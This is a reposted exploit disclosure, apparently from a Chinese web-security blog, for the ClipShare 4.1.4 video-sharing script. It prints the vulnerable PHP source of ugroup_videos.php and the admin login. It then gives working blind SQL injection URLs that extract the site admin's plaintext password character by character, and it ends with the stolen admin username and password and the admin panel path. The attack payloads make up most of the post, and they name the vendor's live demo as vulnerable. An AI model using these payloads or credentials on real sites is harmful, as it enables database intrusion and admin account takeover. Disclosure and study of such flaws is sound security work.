网站优化

首页 > 新闻资讯 > 网站优化 > ClipShare4.1.4存在诸多缺陷

ClipShare4.1.4存在诸多缺陷

2019-09-12 热度:56 ℃
影响程序: ClipShare - Video Sharing Community Script 4.1.4  
官网: http://www.clip-share.com 
缺陷类型: Blind SQl injection && Plaintext Password. 
 AFAIK所有版本问题: 
Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273 
最新监测: 13 March 2013 
提示:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) 
缺陷文件: 
//ugroup_videos.php 
=========================== BEGIN OF ugroup_videos.php ============================================= 

<?php 
/***************************
| Software Name : ClipShare - Video Sharing Community Script 
| Software Author : Clip-Share.Com / ScriptXperts.Com 
| Website : http://www.clip-share.com 
| E-mail : office@clip-share.com 
|****************************
| This source file is subject to the ClipShare End-User License Agreement, available online at: 
| http://www.clip-share.com/video-sharing-script-eula.html 
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby. 
|******************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved. 
|***************************
require('include/config.php'); 
require('include/function.php'); 
$urlkey = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL; 
$uid = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL; 
$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1"; 
$rs = $conn->Execute($sql); 
if($rs->recordcount()>0) { 
STemplate::assign('groupname',$rs->fields[gname]); 
//PAGING STARTS 
$page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL; 
$sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1"; 
$ars = $conn->Execute($sql); 
$total = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini']; 
$tpage = ceil($total/$config['items_per_page']); 
$spage = ( $tpage == 0 ) ? $tpage+1 : $tpage; 
$startfrom = ($page-1)*$config['items_per_page']; 
$sql = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page']; 
$rs = $conn->execute($sql); 
if($rs->recordcount()>0) 
$vdo = $rs->getrows(); 
$start_num = $startfrom+1; 
$end_num = $startfrom+$rs->recordcount(); 
$page_link = ''; 
$type = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL; 
for ( $k=1;$k<=$tpage;$k++ ) 
$page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a>&nbsp;&nbsp;"; 
//END PAGING 
} 
STemplate::assign('err',$err); 
STemplate::assign('msg',$msg); 
STemplate::assign('page',$page); 
STemplate::assign('start_num',$start_num); 
STemplate::assign('end_num',$end_num); 
STemplate::assign('page_link',$page_link); 
STemplate::assign('total',$total); 
STemplate::assign('answers',$vdo); 
STemplate::assign('head_bottom',"grouplinks.tpl"); 
STemplate::display('head1.tpl'); 
STemplate::display('err_msg.tpl'); 
STemplate::display('ugroup_members.tpl'); 
STemplate::display('footer.tpl'); 
STemplate::gzip_encode(); 
?> 

====================END OF ugroup_videos.php========================
Real exploitation example:
_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3
//ON TRUE
//RETURNS: NORMAL PAGE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3
//ON FALSE
// RETURNS NOTHING.(White Page)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3
Plaintext password:
//siteadmin/login.php
============ BEGIN OF siteadmin/login.php ===========================

<?php 
include('../include/config.php'); 
if ( isset($_POST['submit_login']) ) { 
$username = trim($_POST['username']); 
$password = trim($_POST['password']); 
if ( $username == '' or $password == '' ) { 
$err = 'Please provide a username and password!'; 
} else { 
$access = false; 
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'"; 
$conn->execute($sql); 
if ( $conn->Affected_Rows() == 1 ) { 
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'"; 
$conn->execute($sql); 
if ( $conn->Affected_Rows() == 1 ) { 
$access = true; 
} 
} 
// SNIP // 

============ END OF siteadmin/login.php ===========================
//TRUE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3
80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3
Passi cekirik:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
11 simvolludur pass.
========================================================
1-ci simvol: o
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
2-ci simvol: (
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
3-cu simvol: 2
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
4-cu simvol: n
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
5-ci simvol: @
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
6-ci simvol: b
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
7-ci simvol: % (yoxla sonra)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
8-ci simvol: h
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
9-cu simvol: a
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
10-cu simvol: 5
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
11-ci simvol: 1
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
//Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
pass: o(2n@b%ha51
http://www.it165.net /ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3
login: admin
pass: o(2n@b%ha51
http://_REMOVED_/siteadmin/
OwnEd.
已测试版本:
Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
/AkaStep

 

相关文章

被Google忽略的XSS漏洞

被Google忽略的XSS漏洞

事情是这样的。9.11日,我提交了一个google存储型XSS漏洞,并且得到了Google安全团队的回复:  ...

关于常见跨站攻击的防御

关于常见跨站攻击的防御

XSS攻击: 跨站脚本攻击(Cross Site Scripting)。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。...

大话数据库SQL注入的N种姿势

大话数据库SQL注入的N种姿势

一. 背景 数据库凭借其强大的数据存储能力和卓越的数据处理性能,在各行各业的信息化建设中发挥着关键的作用。随着数据库在各行业的大规模应用,数据泄露事件也频繁发生,这就使数据库安全问题也...

Web安全之点击劫持(ClickJacking)

Web安全之点击劫持(ClickJacking)

点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情...

PHP代码审计

PHP代码审计

PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有超过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大...

KingCMS 1.0代码审计出SQL Injection漏洞

KingCMS 1.0代码审计出SQL Injection漏洞

各位站长请提前修复漏洞 官网:http://www.kingcms.com/ /** 分页列表信息 @param int...

帝国CMS(EmpireCMS)商品评分插件注入修复方案

帝国CMS(EmpireCMS)商品评分插件注入修复方案

由于对参数的变量未作初始化检测导致 pf\rate.php 和 pf\ratemovie.php 中变量 $id 存在注入风险。   $id = $_GET['...

代码审计:08cms SQL注入漏洞分析及利用EXP

代码审计:08cms SQL注入漏洞分析及利用EXP

汽车的: /include/paygate/alipay/pays.php /* *类名:alipay_notify *功能:付款过程中服务器通知类 *详细...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!